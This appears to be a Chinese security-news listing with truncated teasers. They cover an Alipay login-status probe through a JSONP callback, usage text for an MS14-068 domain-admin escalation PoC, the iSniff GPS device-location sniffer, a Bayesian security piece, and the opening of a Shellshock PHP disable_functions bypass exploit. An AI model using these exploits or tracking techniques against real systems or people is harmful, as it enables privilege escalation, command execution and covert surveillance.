JSON应用:判断支付宝是否登录 专注XSS三十年 | 2014-12-31 03:16 通过JSON判断登录状态 https://lab.alipay.com/user/msgcenter/getMsgInfosNew.json?_callback=xss&_input_charset=utf-8&ctoken=222&_=1419965709755 已登录: zozi({"popMsg":false,"infos":[],"totalCount":6,"stat":"ok","isRead":false}) 未登录: zozi({"target":"https://auth.alipay.com/login/index.htm?goto=","stat":"deny"}) 支付宝里有很多类似的JSON,虽然请求里

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> OPTIONS: -p <clearPassword> --rc4 <ntlmHash> Example usage : Linux (tested with

iSniff GPS:WIFI被动嗅探工具,嗅探附近无线设备广播泄漏信息定位

iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks. iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks, as described in

贝叶斯安全应用 (1)

贝叶斯安全应用 (1) 杀戮 (某无业游民) | 2014-11-24 18:12 之前在微博上看到一个妹纸分享了一个IBM的paper,关于通过贝叶斯推导数据泄露,很有趣,当然算法本

PHP 5.x - Bypass Disable Functions (via Shellshock)

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 <?php function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283 if(strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".","data"); putenv("PHP_LOL=()